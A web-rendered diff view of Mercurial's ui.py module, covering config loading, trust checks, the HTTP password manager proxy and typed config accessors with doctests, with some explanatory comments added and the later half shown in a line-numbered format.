path: forbid chaining `path://` definitions...
marmoute - r47583:1ecf0823 default
@@ -1,2446 +1,2452 @@
# ui.py - user interface bits for mercurial
#
# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.

from __future__ import absolute_import

import collections
import contextlib
import datetime
import errno
import getpass
import inspect
import os
import re
import signal
import socket
import subprocess
import sys
import traceback

from .i18n import _
from .node import hex
from .pycompat import (
    getattr,
    open,
    setattr,
)

from . import (
    color,
    config,
    configitems,
    encoding,
    error,
    formatter,
    loggingutil,
    progress,
    pycompat,
    rcutil,
    scmutil,
    util,
)
from .utils import (
    dateutil,
    procutil,
    resourceutil,
    stringutil,
)

urlreq = util.urlreq

# for use with str.translate(None, _keepalnum), to keep just alphanumerics
_keepalnum = b''.join(
    c for c in map(pycompat.bytechr, range(256)) if not c.isalnum()
)

# The config knobs that will be altered (if unset) by ui.tweakdefaults.
tweakrc = b"""
[ui]
# The rollback command is dangerous. As a rule, don't use it.
rollback = False
# Make `hg status` report copy information
statuscopies = yes
# Prefer curses UIs when available. Revert to plain-text with `text`.
interface = curses
# Make compatible commands emit cwd-relative paths by default.
relative-paths = yes

[commands]
# Grep working directory by default.
grep.all-files = True
# Refuse to perform an `hg update` that would cause a file content merge
update.check = noconflict
# Show conflicts information in `hg status`
status.verbose = True
# Make `hg resolve` with no action (like `-m`) fail instead of re-merging.
resolve.explicit-re-merge = True

[diff]
git = 1
showfunc = 1
word-diff = 1
"""
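
# Editor's note (illustrative, not part of upstream ui.py): the tweaks above
# only take effect when a user opts in, for example with the following in an
# hgrc:
#
#   [ui]
#   tweakdefaults = True
#
# and they are skipped under HGPLAIN; see ui._maybetweakdefaults() below.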

samplehgrcs = {
    b'user': b"""# example user config (see 'hg help config' for more info)
[ui]
# name and email, e.g.
# username = Jane Doe <jdoe@example.com>
username =

# We recommend enabling tweakdefaults to get slight improvements to
# the UI over time. Make sure to set HGPLAIN in the environment when
# writing scripts!
# tweakdefaults = True

# uncomment to disable color in command output
# (see 'hg help color' for details)
# color = never

# uncomment to disable command output pagination
# (see 'hg help pager' for details)
# paginate = never

[extensions]
# uncomment the lines below to enable some popular extensions
# (see 'hg help extensions' for more info)
#
# histedit =
# rebase =
# uncommit =
""",
    b'cloned': b"""# example repository config (see 'hg help config' for more info)
[paths]
default = %s

# path aliases to other clones of this repo in URLs or filesystem paths
# (see 'hg help config.paths' for more info)
#
# default:pushurl = ssh://jdoe@example.net/hg/jdoes-fork
# my-fork = ssh://jdoe@example.net/hg/jdoes-fork
# my-clone = /home/jdoe/jdoes-clone

[ui]
# name and email (local to this repository, optional), e.g.
# username = Jane Doe <jdoe@example.com>
""",
    b'local': b"""# example repository config (see 'hg help config' for more info)
[paths]
# path aliases to other clones of this repo in URLs or filesystem paths
# (see 'hg help config.paths' for more info)
#
# default = http://example.com/hg/example-repo
# default:pushurl = ssh://jdoe@example.net/hg/jdoes-fork
# my-fork = ssh://jdoe@example.net/hg/jdoes-fork
# my-clone = /home/jdoe/jdoes-clone

[ui]
# name and email (local to this repository, optional), e.g.
# username = Jane Doe <jdoe@example.com>
""",
    b'global': b"""# example system-wide hg config (see 'hg help config' for more info)

[ui]
# uncomment to disable color in command output
# (see 'hg help color' for details)
# color = never

# uncomment to disable command output pagination
# (see 'hg help pager' for details)
# paginate = never

[extensions]
# uncomment the lines below to enable some popular extensions
# (see 'hg help extensions' for more info)
#
# blackbox =
# churn =
""",
}


def _maybestrurl(maybebytes):
    return pycompat.rapply(pycompat.strurl, maybebytes)


def _maybebytesurl(maybestr):
    return pycompat.rapply(pycompat.bytesurl, maybestr)


class httppasswordmgrdbproxy(object):
    """Delays loading urllib2 until it's needed."""

    def __init__(self):
        self._mgr = None

    def _get_mgr(self):
        if self._mgr is None:
            self._mgr = urlreq.httppasswordmgrwithdefaultrealm()
        return self._mgr

    def add_password(self, realm, uris, user, passwd):
        return self._get_mgr().add_password(
            _maybestrurl(realm),
            _maybestrurl(uris),
            _maybestrurl(user),
            _maybestrurl(passwd),
        )

    def find_user_password(self, realm, uri):
        mgr = self._get_mgr()
        return _maybebytesurl(
            mgr.find_user_password(_maybestrurl(realm), _maybestrurl(uri))
        )

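# Editor's sketch (illustrative, not upstream code): the proxy above defers
# the cost of building urllib's password manager until credentials are first
# needed. A ui instance exposes it as ``ui.httppasswordmgrdb``, so a caller
# could, for example, register credentials with
#
#   ui.httppasswordmgrdb.add_password(None, b'https://example.com/hg',
#                                     b'jdoe', b'secret')
#
# (the realm, URL, and credentials here are made up for illustration).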

def _catchterm(*args):
    raise error.SignalInterrupt


# unique object used to detect no default value has been provided when
# retrieving configuration value.
_unset = object()

# _reqexithandlers: callbacks run at the end of a request
_reqexithandlers = []


class ui(object):
    def __init__(self, src=None):
        """Create a fresh new ui object if no src given

        Use uimod.ui.load() to create a ui which knows global and user configs.
        In most cases, you should use ui.copy() to create a copy of an existing
        ui object.
        """
        # _buffers: used for temporary capture of output
        self._buffers = []
        # 3-tuple describing how each buffer in the stack behaves.
        # Values are (capture stderr, capture subprocesses, apply labels).
        self._bufferstates = []
        # When a buffer is active, defines whether we are expanding labels.
        # This exists to prevent an extra list lookup.
        self._bufferapplylabels = None
        self.quiet = self.verbose = self.debugflag = self.tracebackflag = False
        self._reportuntrusted = True
        self._knownconfig = configitems.coreitems
        self._ocfg = config.config()  # overlay
        self._tcfg = config.config()  # trusted
        self._ucfg = config.config()  # untrusted
        self._trustusers = set()
        self._trustgroups = set()
        self.callhooks = True
        # Insecure server connections requested.
        self.insecureconnections = False
        # Blocked time
        self.logblockedtimes = False
        # color mode: see mercurial/color.py for possible value
        self._colormode = None
        self._terminfoparams = {}
        self._styles = {}
        self._uninterruptible = False
        self.showtimestamp = False

        if src:
            self._fout = src._fout
            self._ferr = src._ferr
            self._fin = src._fin
            self._fmsg = src._fmsg
            self._fmsgout = src._fmsgout
            self._fmsgerr = src._fmsgerr
            self._finoutredirected = src._finoutredirected
            self._loggers = src._loggers.copy()
            self.pageractive = src.pageractive
            self._disablepager = src._disablepager
            self._tweaked = src._tweaked

            self._tcfg = src._tcfg.copy()
            self._ucfg = src._ucfg.copy()
            self._ocfg = src._ocfg.copy()
            self._trustusers = src._trustusers.copy()
            self._trustgroups = src._trustgroups.copy()
            self.environ = src.environ
            self.callhooks = src.callhooks
            self.insecureconnections = src.insecureconnections
            self._colormode = src._colormode
            self._terminfoparams = src._terminfoparams.copy()
            self._styles = src._styles.copy()

            self.fixconfig()

            self.httppasswordmgrdb = src.httppasswordmgrdb
            self._blockedtimes = src._blockedtimes
        else:
            self._fout = procutil.stdout
            self._ferr = procutil.stderr
            self._fin = procutil.stdin
            self._fmsg = None
            self._fmsgout = self.fout  # configurable
            self._fmsgerr = self.ferr  # configurable
            self._finoutredirected = False
            self._loggers = {}
            self.pageractive = False
            self._disablepager = False
            self._tweaked = False

            # shared read-only environment
            self.environ = encoding.environ

            self.httppasswordmgrdb = httppasswordmgrdbproxy()
            self._blockedtimes = collections.defaultdict(int)

        allowed = self.configlist(b'experimental', b'exportableenviron')
        if b'*' in allowed:
            self._exportableenviron = self.environ
        else:
            self._exportableenviron = {}
            for k in allowed:
                if k in self.environ:
                    self._exportableenviron[k] = self.environ[k]

    def _new_source(self):
        self._ocfg.new_source()
        self._tcfg.new_source()
        self._ucfg.new_source()

    @classmethod
    def load(cls):
        """Create a ui and load global and user configs"""
        u = cls()
        # we always trust global config files and environment variables
        for t, f in rcutil.rccomponents():
            if t == b'path':
                u.readconfig(f, trust=True)
            elif t == b'resource':
                u.read_resource_config(f, trust=True)
            elif t == b'items':
                u._new_source()
                sections = set()
                for section, name, value, source in f:
                    # do not set u._ocfg
                    # XXX clean this up once immutable config object is a thing
                    u._tcfg.set(section, name, value, source)
                    u._ucfg.set(section, name, value, source)
                    sections.add(section)
                for section in sections:
                    u.fixconfig(section=section)
            else:
                raise error.ProgrammingError(b'unknown rctype: %s' % t)
        u._maybetweakdefaults()
        u._new_source()  # anything after that is a different level
        return u

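    # Editor's sketch (illustrative, not upstream code): per the docstrings
    # above, a fully configured instance normally comes from ``load()`` rather
    # than the bare constructor, and per-command copies come from ``copy()``:
    #
    #   from mercurial import ui as uimod
    #   u = uimod.ui.load()        # global and user config applied
    #   u.setconfig(b'ui', b'quiet', b'true', b'example')
    #   u2 = u.copy()              # independent copy of the configured ui
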
    def _maybetweakdefaults(self):
        if not self.configbool(b'ui', b'tweakdefaults'):
            return
        if self._tweaked or self.plain(b'tweakdefaults'):
            return

        # Note: it is SUPER IMPORTANT that you set self._tweaked to
        # True *before* any calls to setconfig(), otherwise you'll get
        # infinite recursion between setconfig and this method.
        #
        # TODO: We should extract an inner method in setconfig() to
        # avoid this weirdness.
        self._tweaked = True
        tmpcfg = config.config()
        tmpcfg.parse(b'<tweakdefaults>', tweakrc)
        for section in tmpcfg:
            for name, value in tmpcfg.items(section):
                if not self.hasconfig(section, name):
                    self.setconfig(section, name, value, b"<tweakdefaults>")

    def copy(self):
        return self.__class__(self)

    def resetstate(self):
        """Clear internal state that shouldn't persist across commands"""
        if self._progbar:
            self._progbar.resetstate()  # reset last-print time of progress bar
        self.httppasswordmgrdb = httppasswordmgrdbproxy()

    @contextlib.contextmanager
    def timeblockedsection(self, key):
        # this is open-coded below - search for timeblockedsection to find them
        starttime = util.timer()
        try:
            yield
        finally:
            self._blockedtimes[key + b'_blocked'] += (
                util.timer() - starttime
            ) * 1000

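    # Editor's sketch (illustrative, not upstream code): callers wrap
    # potentially blocking work so the wait is accumulated per key in
    # ui._blockedtimes, e.g.
    #
    #   with ui.timeblockedsection(b'stdio'):
    #       data = ui.fin.read()
    #
    # These totals are only surfaced when ui.logblockedtimes (read in
    # fixconfig() below) is enabled.
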
    @contextlib.contextmanager
    def uninterruptible(self):
        """Mark an operation as unsafe.

        Most operations on a repository are safe to interrupt, but a
        few are risky (for example repair.strip). This context manager
        lets you advise Mercurial that something risky is happening so
        that control-C etc can be blocked if desired.
        """
        enabled = self.configbool(b'experimental', b'nointerrupt')
        if enabled and self.configbool(
            b'experimental', b'nointerrupt-interactiveonly'
        ):
            enabled = self.interactive()
        if self._uninterruptible or not enabled:
            # if nointerrupt support is turned off, the process isn't
            # interactive, or we're already in an uninterruptible
            # block, do nothing.
            yield
            return

        def warn():
            self.warn(_(b"shutting down cleanly\n"))
            self.warn(
                _(b"press ^C again to terminate immediately (dangerous)\n")
            )
            return True

        with procutil.uninterruptible(warn):
            try:
                self._uninterruptible = True
                yield
            finally:
                self._uninterruptible = False

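    # Editor's sketch (illustrative, not upstream code): a risky operation
    # such as the strip mentioned in the docstring above would be guarded like
    #
    #   with repo.ui.uninterruptible():
    #       repair.strip(repo.ui, repo, [node])
    #
    # which only changes behaviour when experimental.nointerrupt is enabled.
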
    def formatter(self, topic, opts):
        return formatter.formatter(self, self, topic, opts)

    def _trusted(self, fp, f):
        st = util.fstat(fp)
        if util.isowner(st):
            return True

        tusers, tgroups = self._trustusers, self._trustgroups
        if b'*' in tusers or b'*' in tgroups:
            return True

        user = util.username(st.st_uid)
        group = util.groupname(st.st_gid)
        if user in tusers or group in tgroups or user == util.username():
            return True

        if self._reportuntrusted:
            self.warn(
                _(
                    b'not trusting file %s from untrusted '
                    b'user %s, group %s\n'
                )
                % (f, user, group)
            )
        return False

    def read_resource_config(
        self, name, root=None, trust=False, sections=None, remap=None
    ):
        try:
            fp = resourceutil.open_resource(name[0], name[1])
        except IOError:
            if not sections:  # ignore unless we were looking for something
                return
            raise

        self._readconfig(
            b'resource:%s.%s' % name, fp, root, trust, sections, remap
        )

    def readconfig(
        self, filename, root=None, trust=False, sections=None, remap=None
    ):
        try:
            fp = open(filename, 'rb')
        except IOError:
            if not sections:  # ignore unless we were looking for something
                return
            raise

        self._readconfig(filename, fp, root, trust, sections, remap)

    def _readconfig(
        self, filename, fp, root=None, trust=False, sections=None, remap=None
    ):
        with fp:
            cfg = config.config()
            trusted = sections or trust or self._trusted(fp, filename)

            try:
                cfg.read(filename, fp, sections=sections, remap=remap)
            except error.ConfigError as inst:
                if trusted:
                    raise
                self.warn(
                    _(b'ignored %s: %s\n') % (inst.location, inst.message)
                )

        self._applyconfig(cfg, trusted, root)

    def applyconfig(self, configitems, source=b"", root=None):
        """Add configitems from a non-file source. Unlike with ``setconfig()``,
        they can be overridden by subsequent config file reads. The items are
        in the same format as ``configoverride()``, namely a dict of the
        following structures: {(section, name) : value}

        Typically this is used by extensions that inject themselves into the
        config file load procedure by monkeypatching ``localrepo.loadhgrc()``.
        """
        cfg = config.config()

        for (section, name), value in configitems.items():
            cfg.set(section, name, value, source)

        self._applyconfig(cfg, True, root)

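    # Editor's sketch (illustrative, not upstream code) of the dict shape that
    # applyconfig() documents above (``myextension`` is a made-up source
    # name):
    #
    #   ui.applyconfig(
    #       {(b'ui', b'username'): b'Jane Doe <jdoe@example.com>'},
    #       source=b'myextension',
    #   )
    #
    # Unlike setconfig(), a later config file read may still override this
    # value.
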
    def _applyconfig(self, cfg, trusted, root):
        if self.plain():
            for k in (
                b'debug',
                b'fallbackencoding',
                b'quiet',
                b'slash',
                b'logtemplate',
                b'message-output',
                b'statuscopies',
                b'style',
                b'traceback',
                b'verbose',
            ):
                if k in cfg[b'ui']:
                    del cfg[b'ui'][k]
            for k, v in cfg.items(b'defaults'):
                del cfg[b'defaults'][k]
            for k, v in cfg.items(b'commands'):
                del cfg[b'commands'][k]
            for k, v in cfg.items(b'command-templates'):
                del cfg[b'command-templates'][k]
            # Don't remove aliases from the configuration if in the exceptionlist
            if self.plain(b'alias'):
                for k, v in cfg.items(b'alias'):
                    del cfg[b'alias'][k]
            if self.plain(b'revsetalias'):
                for k, v in cfg.items(b'revsetalias'):
                    del cfg[b'revsetalias'][k]
            if self.plain(b'templatealias'):
                for k, v in cfg.items(b'templatealias'):
                    del cfg[b'templatealias'][k]

        if trusted:
            self._tcfg.update(cfg)
            self._tcfg.update(self._ocfg)
        self._ucfg.update(cfg)
        self._ucfg.update(self._ocfg)

        if root is None:
            root = os.path.expanduser(b'~')
        self.fixconfig(root=root)

    def fixconfig(self, root=None, section=None):
        if section in (None, b'paths'):
            # expand vars and ~
            # translate paths relative to root (or home) into absolute paths
            root = root or encoding.getcwd()
            for c in self._tcfg, self._ucfg, self._ocfg:
                for n, p in c.items(b'paths'):
                    # Ignore sub-options.
                    if b':' in n:
                        continue
                    if not p:
                        continue
                    if b'%%' in p:
                        s = self.configsource(b'paths', n) or b'none'
                        self.warn(
                            _(b"(deprecated '%%' in path %s=%s from %s)\n")
                            % (n, p, s)
                        )
                        p = p.replace(b'%%', b'%')
                    p = util.expandpath(p)
                    if not util.hasscheme(p) and not os.path.isabs(p):
                        p = os.path.normpath(os.path.join(root, p))
                    c.alter(b"paths", n, p)

        if section in (None, b'ui'):
            # update ui options
            self._fmsgout, self._fmsgerr = _selectmsgdests(self)
            self.debugflag = self.configbool(b'ui', b'debug')
            self.verbose = self.debugflag or self.configbool(b'ui', b'verbose')
            self.quiet = not self.debugflag and self.configbool(b'ui', b'quiet')
            if self.verbose and self.quiet:
                self.quiet = self.verbose = False
            self._reportuntrusted = self.debugflag or self.configbool(
                b"ui", b"report_untrusted"
            )
            self.showtimestamp = self.configbool(b'ui', b'timestamp-output')
            self.tracebackflag = self.configbool(b'ui', b'traceback')
            self.logblockedtimes = self.configbool(b'ui', b'logblockedtimes')

        if section in (None, b'trusted'):
            # update trust information
            self._trustusers.update(self.configlist(b'trusted', b'users'))
            self._trustgroups.update(self.configlist(b'trusted', b'groups'))

        if section in (None, b'devel', b'ui') and self.debugflag:
            tracked = set()
            if self.configbool(b'devel', b'debug.extensions'):
                tracked.add(b'extension')
            if tracked:
                logger = loggingutil.fileobjectlogger(self._ferr, tracked)
                self.setlogger(b'debug', logger)

    def backupconfig(self, section, item):
        return (
            self._ocfg.backup(section, item),
            self._tcfg.backup(section, item),
            self._ucfg.backup(section, item),
        )

    def restoreconfig(self, data):
        self._ocfg.restore(data[0])
        self._tcfg.restore(data[1])
        self._ucfg.restore(data[2])

    def setconfig(self, section, name, value, source=b''):
        for cfg in (self._ocfg, self._tcfg, self._ucfg):
            cfg.set(section, name, value, source)
        self.fixconfig(section=section)
        self._maybetweakdefaults()

    def _data(self, untrusted):
        return untrusted and self._ucfg or self._tcfg

    def configsource(self, section, name, untrusted=False):
        return self._data(untrusted).source(section, name)

    def config(self, section, name, default=_unset, untrusted=False):
        """return the plain string version of a config"""
        value = self._config(
            section, name, default=default, untrusted=untrusted
        )
        if value is _unset:
            return None
        return value

    def _config(self, section, name, default=_unset, untrusted=False):
        value = itemdefault = default
        item = self._knownconfig.get(section, {}).get(name)
        alternates = [(section, name)]

        if item is not None:
            alternates.extend(item.alias)
            if callable(item.default):
                itemdefault = item.default()
            else:
                itemdefault = item.default
        else:
            msg = b"accessing unregistered config item: '%s.%s'"
            msg %= (section, name)
            self.develwarn(msg, 2, b'warn-config-unknown')

        if default is _unset:
            if item is None:
                value = default
            elif item.default is configitems.dynamicdefault:
                value = None
                msg = b"config item requires an explicit default value: '%s.%s'"
                msg %= (section, name)
                self.develwarn(msg, 2, b'warn-config-default')
            else:
                value = itemdefault
        elif (
            item is not None
            and item.default is not configitems.dynamicdefault
            and default != itemdefault
        ):
            msg = (
                b"specifying a mismatched default value for a registered "
                b"config item: '%s.%s' '%s'"
            )
            msg %= (section, name, pycompat.bytestr(default))
            self.develwarn(msg, 2, b'warn-config-default')

        candidates = []
        config = self._data(untrusted)
        for s, n in alternates:
            candidate = config.get(s, n, None)
            if candidate is not None:
                candidates.append((s, n, candidate))
        if candidates:

            def level(x):
                return config.level(x[0], x[1])

            value = max(candidates, key=level)[2]

        if self.debugflag and not untrusted and self._reportuntrusted:
            for s, n in alternates:
                uvalue = self._ucfg.get(s, n)
                if uvalue is not None and uvalue != value:
                    self.debug(
                        b"ignoring untrusted configuration option "
                        b"%s.%s = %s\n" % (s, n, uvalue)
                    )
        return value

    def config_default(self, section, name):
        """return the default value for a config option

        The default is returned "raw", for example if it is a callable, the
        callable was not called.
        """
        item = self._knownconfig.get(section, {}).get(name)

        if item is None:
            raise KeyError((section, name))
        return item.default

    def configsuboptions(self, section, name, default=_unset, untrusted=False):
        """Get a config option and all sub-options.

        Some config options have sub-options that are declared with the
        format "key:opt = value". This method is used to return the main
        option and all its declared sub-options.

        Returns a 2-tuple of ``(option, sub-options)``, where `sub-options``
        is a dict of defined sub-options where keys and values are strings.
        """
        main = self.config(section, name, default, untrusted=untrusted)
        data = self._data(untrusted)
        sub = {}
        prefix = b'%s:' % name
        for k, v in data.items(section):
            if k.startswith(prefix):
                sub[k[len(prefix) :]] = v

        if self.debugflag and not untrusted and self._reportuntrusted:
            for k, v in sub.items():
                uvalue = self._ucfg.get(section, b'%s:%s' % (name, k))
                if uvalue is not None and uvalue != v:
                    self.debug(
                        b'ignoring untrusted configuration option '
                        b'%s:%s.%s = %s\n' % (section, name, k, uvalue)
                    )

        return main, sub

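    # Editor's note (illustrative, not upstream code): the "key:opt = value"
    # form handled above matches the sample [paths] config earlier in this
    # file, e.g.
    #
    #   [paths]
    #   default = http://example.com/hg/example-repo
    #   default:pushurl = ssh://jdoe@example.net/hg/jdoes-fork
    #
    # for which configsuboptions(b'paths', b'default') would return the main
    # URL together with {b'pushurl': b'ssh://jdoe@example.net/hg/jdoes-fork'}.
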
729 def configpath(self, section, name, default=_unset, untrusted=False):
729 def configpath(self, section, name, default=_unset, untrusted=False):
730 """get a path config item, expanded relative to repo root or config
730 """get a path config item, expanded relative to repo root or config
731 file"""
731 file"""
732 v = self.config(section, name, default, untrusted)
732 v = self.config(section, name, default, untrusted)
733 if v is None:
733 if v is None:
734 return None
734 return None
735 if not os.path.isabs(v) or b"://" not in v:
735 if not os.path.isabs(v) or b"://" not in v:
736 src = self.configsource(section, name, untrusted)
736 src = self.configsource(section, name, untrusted)
737 if b':' in src:
737 if b':' in src:
738 base = os.path.dirname(src.rsplit(b':')[0])
738 base = os.path.dirname(src.rsplit(b':')[0])
739 v = os.path.join(base, os.path.expanduser(v))
739 v = os.path.join(base, os.path.expanduser(v))
740 return v
740 return v
741
741
742 def configbool(self, section, name, default=_unset, untrusted=False):
742 def configbool(self, section, name, default=_unset, untrusted=False):
743 """parse a configuration element as a boolean
743 """parse a configuration element as a boolean
744
744
745 >>> u = ui(); s = b'foo'
745 >>> u = ui(); s = b'foo'
746 >>> u.setconfig(s, b'true', b'yes')
746 >>> u.setconfig(s, b'true', b'yes')
747 >>> u.configbool(s, b'true')
747 >>> u.configbool(s, b'true')
748 True
748 True
749 >>> u.setconfig(s, b'false', b'no')
749 >>> u.setconfig(s, b'false', b'no')
750 >>> u.configbool(s, b'false')
750 >>> u.configbool(s, b'false')
751 False
751 False
752 >>> u.configbool(s, b'unknown')
752 >>> u.configbool(s, b'unknown')
753 False
753 False
754 >>> u.configbool(s, b'unknown', True)
754 >>> u.configbool(s, b'unknown', True)
755 True
755 True
756 >>> u.setconfig(s, b'invalid', b'somevalue')
756 >>> u.setconfig(s, b'invalid', b'somevalue')
757 >>> u.configbool(s, b'invalid')
757 >>> u.configbool(s, b'invalid')
758 Traceback (most recent call last):
758 Traceback (most recent call last):
759 ...
759 ...
760 ConfigError: foo.invalid is not a boolean ('somevalue')
760 ConfigError: foo.invalid is not a boolean ('somevalue')
761 """
761 """
762
762
763 v = self._config(section, name, default, untrusted=untrusted)
763 v = self._config(section, name, default, untrusted=untrusted)
764 if v is None:
764 if v is None:
765 return v
765 return v
766 if v is _unset:
766 if v is _unset:
767 if default is _unset:
767 if default is _unset:
768 return False
768 return False
769 return default
769 return default
770 if isinstance(v, bool):
770 if isinstance(v, bool):
771 return v
771 return v
772 b = stringutil.parsebool(v)
772 b = stringutil.parsebool(v)
773 if b is None:
773 if b is None:
774 raise error.ConfigError(
774 raise error.ConfigError(
775 _(b"%s.%s is not a boolean ('%s')") % (section, name, v)
775 _(b"%s.%s is not a boolean ('%s')") % (section, name, v)
776 )
776 )
777 return b
777 return b
778
778
779 def configwith(
779 def configwith(
780 self, convert, section, name, default=_unset, desc=None, untrusted=False
780 self, convert, section, name, default=_unset, desc=None, untrusted=False
781 ):
781 ):
782 """parse a configuration element with a conversion function
782 """parse a configuration element with a conversion function
783
783
784 >>> u = ui(); s = b'foo'
784 >>> u = ui(); s = b'foo'
785 >>> u.setconfig(s, b'float1', b'42')
785 >>> u.setconfig(s, b'float1', b'42')
786 >>> u.configwith(float, s, b'float1')
786 >>> u.configwith(float, s, b'float1')
787 42.0
787 42.0
788 >>> u.setconfig(s, b'float2', b'-4.25')
788 >>> u.setconfig(s, b'float2', b'-4.25')
789 >>> u.configwith(float, s, b'float2')
789 >>> u.configwith(float, s, b'float2')
790 -4.25
790 -4.25
791 >>> u.configwith(float, s, b'unknown', 7)
791 >>> u.configwith(float, s, b'unknown', 7)
792 7.0
792 7.0
793 >>> u.setconfig(s, b'invalid', b'somevalue')
793 >>> u.setconfig(s, b'invalid', b'somevalue')
794 >>> u.configwith(float, s, b'invalid')
794 >>> u.configwith(float, s, b'invalid')
795 Traceback (most recent call last):
795 Traceback (most recent call last):
796 ...
796 ...
797 ConfigError: foo.invalid is not a valid float ('somevalue')
797 ConfigError: foo.invalid is not a valid float ('somevalue')
798 >>> u.configwith(float, s, b'invalid', desc=b'womble')
798 >>> u.configwith(float, s, b'invalid', desc=b'womble')
799 Traceback (most recent call last):
799 Traceback (most recent call last):
800 ...
800 ...
801 ConfigError: foo.invalid is not a valid womble ('somevalue')
801 ConfigError: foo.invalid is not a valid womble ('somevalue')
802 """
802 """
803
803
804 v = self.config(section, name, default, untrusted)
804 v = self.config(section, name, default, untrusted)
805 if v is None:
805 if v is None:
806 return v # do not attempt to convert None
806 return v # do not attempt to convert None
807 try:
807 try:
808 return convert(v)
808 return convert(v)
809 except (ValueError, error.ParseError):
809 except (ValueError, error.ParseError):
810 if desc is None:
810 if desc is None:
811 desc = pycompat.sysbytes(convert.__name__)
811 desc = pycompat.sysbytes(convert.__name__)
812 raise error.ConfigError(
812 raise error.ConfigError(
813 _(b"%s.%s is not a valid %s ('%s')") % (section, name, desc, v)
813 _(b"%s.%s is not a valid %s ('%s')") % (section, name, desc, v)
814 )
814 )
815
815
816 def configint(self, section, name, default=_unset, untrusted=False):
816 def configint(self, section, name, default=_unset, untrusted=False):
817 """parse a configuration element as an integer
817 """parse a configuration element as an integer
818
818
819 >>> u = ui(); s = b'foo'
819 >>> u = ui(); s = b'foo'
820 >>> u.setconfig(s, b'int1', b'42')
820 >>> u.setconfig(s, b'int1', b'42')
821 >>> u.configint(s, b'int1')
821 >>> u.configint(s, b'int1')
822 42
822 42
823 >>> u.setconfig(s, b'int2', b'-42')
823 >>> u.setconfig(s, b'int2', b'-42')
824 >>> u.configint(s, b'int2')
824 >>> u.configint(s, b'int2')
825 -42
825 -42
826 >>> u.configint(s, b'unknown', 7)
826 >>> u.configint(s, b'unknown', 7)
827 7
827 7
828 >>> u.setconfig(s, b'invalid', b'somevalue')
828 >>> u.setconfig(s, b'invalid', b'somevalue')
829 >>> u.configint(s, b'invalid')
829 >>> u.configint(s, b'invalid')
830 Traceback (most recent call last):
830 Traceback (most recent call last):
831 ...
831 ...
832 ConfigError: foo.invalid is not a valid integer ('somevalue')
832 ConfigError: foo.invalid is not a valid integer ('somevalue')
833 """
833 """
834
834
835 return self.configwith(
835 return self.configwith(
836 int, section, name, default, b'integer', untrusted
836 int, section, name, default, b'integer', untrusted
837 )
837 )
838
838
839 def configbytes(self, section, name, default=_unset, untrusted=False):
839 def configbytes(self, section, name, default=_unset, untrusted=False):
840 """parse a configuration element as a quantity in bytes
840 """parse a configuration element as a quantity in bytes
841
841
842 Units can be specified as b (bytes), k or kb (kilobytes), m or
842 Units can be specified as b (bytes), k or kb (kilobytes), m or
843 mb (megabytes), g or gb (gigabytes).
843 mb (megabytes), g or gb (gigabytes).
844
844
845 >>> u = ui(); s = b'foo'
845 >>> u = ui(); s = b'foo'
846 >>> u.setconfig(s, b'val1', b'42')
846 >>> u.setconfig(s, b'val1', b'42')
847 >>> u.configbytes(s, b'val1')
847 >>> u.configbytes(s, b'val1')
848 42
848 42
849 >>> u.setconfig(s, b'val2', b'42.5 kb')
849 >>> u.setconfig(s, b'val2', b'42.5 kb')
850 >>> u.configbytes(s, b'val2')
850 >>> u.configbytes(s, b'val2')
851 43520
851 43520
852 >>> u.configbytes(s, b'unknown', b'7 MB')
852 >>> u.configbytes(s, b'unknown', b'7 MB')
853 7340032
853 7340032
854 >>> u.setconfig(s, b'invalid', b'somevalue')
854 >>> u.setconfig(s, b'invalid', b'somevalue')
855 >>> u.configbytes(s, b'invalid')
855 >>> u.configbytes(s, b'invalid')
856 Traceback (most recent call last):
856 Traceback (most recent call last):
857 ...
857 ...
858 ConfigError: foo.invalid is not a byte quantity ('somevalue')
858 ConfigError: foo.invalid is not a byte quantity ('somevalue')
859 """
859 """
860
860
861 value = self._config(section, name, default, untrusted)
861 value = self._config(section, name, default, untrusted)
862 if value is _unset:
862 if value is _unset:
863 if default is _unset:
863 if default is _unset:
864 default = 0
864 default = 0
865 value = default
865 value = default
866 if not isinstance(value, bytes):
866 if not isinstance(value, bytes):
867 return value
867 return value
868 try:
868 try:
869 return util.sizetoint(value)
869 return util.sizetoint(value)
870 except error.ParseError:
870 except error.ParseError:
871 raise error.ConfigError(
871 raise error.ConfigError(
872 _(b"%s.%s is not a byte quantity ('%s')")
872 _(b"%s.%s is not a byte quantity ('%s')")
873 % (section, name, value)
873 % (section, name, value)
874 )
874 )
875
875
876 def configlist(self, section, name, default=_unset, untrusted=False):
876 def configlist(self, section, name, default=_unset, untrusted=False):
877 """parse a configuration element as a list of comma/space separated
877 """parse a configuration element as a list of comma/space separated
878 strings
878 strings
879
879
880 >>> u = ui(); s = b'foo'
880 >>> u = ui(); s = b'foo'
881 >>> u.setconfig(s, b'list1', b'this,is "a small" ,test')
881 >>> u.setconfig(s, b'list1', b'this,is "a small" ,test')
882 >>> u.configlist(s, b'list1')
882 >>> u.configlist(s, b'list1')
883 ['this', 'is', 'a small', 'test']
883 ['this', 'is', 'a small', 'test']
884 >>> u.setconfig(s, b'list2', b'this, is "a small" , test ')
884 >>> u.setconfig(s, b'list2', b'this, is "a small" , test ')
885 >>> u.configlist(s, b'list2')
885 >>> u.configlist(s, b'list2')
886 ['this', 'is', 'a small', 'test']
886 ['this', 'is', 'a small', 'test']
887 """
887 """
888 # default is not always a list
888 # default is not always a list
889 v = self.configwith(
889 v = self.configwith(
890 config.parselist, section, name, default, b'list', untrusted
890 config.parselist, section, name, default, b'list', untrusted
891 )
891 )
892 if isinstance(v, bytes):
892 if isinstance(v, bytes):
893 return config.parselist(v)
893 return config.parselist(v)
894 elif v is None:
894 elif v is None:
895 return []
895 return []
896 return v
896 return v
897
897
898 def configdate(self, section, name, default=_unset, untrusted=False):
898 def configdate(self, section, name, default=_unset, untrusted=False):
899 """parse a configuration element as a tuple of ints
899 """parse a configuration element as a tuple of ints
900
900
901 >>> u = ui(); s = b'foo'
901 >>> u = ui(); s = b'foo'
902 >>> u.setconfig(s, b'date', b'0 0')
902 >>> u.setconfig(s, b'date', b'0 0')
903 >>> u.configdate(s, b'date')
903 >>> u.configdate(s, b'date')
904 (0, 0)
904 (0, 0)
905 """
905 """
906 if self.config(section, name, default, untrusted):
906 if self.config(section, name, default, untrusted):
907 return self.configwith(
907 return self.configwith(
908 dateutil.parsedate, section, name, default, b'date', untrusted
908 dateutil.parsedate, section, name, default, b'date', untrusted
909 )
909 )
910 if default is _unset:
910 if default is _unset:
911 return None
911 return None
912 return default
912 return default
913
913
914 def configdefault(self, section, name):
